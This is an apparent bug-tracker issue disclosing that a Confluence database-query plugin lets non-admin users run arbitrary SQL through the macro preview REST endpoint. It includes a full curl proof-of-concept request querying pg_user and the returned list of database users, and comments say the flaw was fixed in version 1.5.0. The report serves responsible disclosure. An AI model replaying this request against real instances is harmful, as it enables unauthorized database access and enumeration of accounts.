Plugin security profile do not work , database exposed over CLI to any user.
Issue #102
resolved
$ curl -i -s -k -X $'POST' -H $'Host: confluence-beta.nodomain.com' -H $'Connection: close' -H $'Content-Length: 173' -H $'Accept: text/html, /; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) (KHTML, like Gecko) Chrome/81.0.4044.138' -H $'Content-Type: application/json; charset=UTF-8' -H $'Origin: https://confluence-beta.nodomain.com' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: https://confluence-beta.nodomain.com/pages/viewpage.action?spaceKey=RT&title=This+is+just+a+test' -H $'Accept-Language: en-US,en;q=0.9' -H $'Cookie: JSESSIONID=1234567890; ' -b $'JSESSIONID=1234567890' --data-binary $'{\"contentId\":\"1814331405\",\"macro\":{\"name\":\"database-query-compact\",\"body\":\"\",\"params\":{\"profile\":\"4916321\",\"profile-name\":\"confluence\",\"sql\":\"SELECT usename FROM pg_user\"}}}' $'https://confluence-beta.nodomain.com/rest/tinymce/1/macro/preview' | tail -n 40
Output ::
<table class="aui"> <thead> <tr> <th>usename</th> </tr> </thead> <tbody> <tr> <td>confluenceuser</td> </tr> <tr> <td>replicator</td> </tr> <tr> <td>foox</td> </tr> <tr> <td>postgres</td> </tr> <tr> <td>confluenceread</td> </tr> </tbody>
Comments (6)
-
-
any updates? .. OR .. you dont think this need to be fixed.
-
I’ve been working on a fix. I thought I had the answer, but as I was testing I realized that my idea didn’t cover all of the bases so I’m continuing to work on it.
-
-
assigned issue to
Scott Selberg
-
assigned issue to
-
- changed status to open
-
- changed status to resolved
This was fixed in 1.5.0
- Log in to comment
Note: I masked out the User-Agent a bit as it had some proprietary info, so you might find it incomplete. We are heavy users of this plugin and really like it. But even a read query can pose harmful and extended database cost by non-admin users.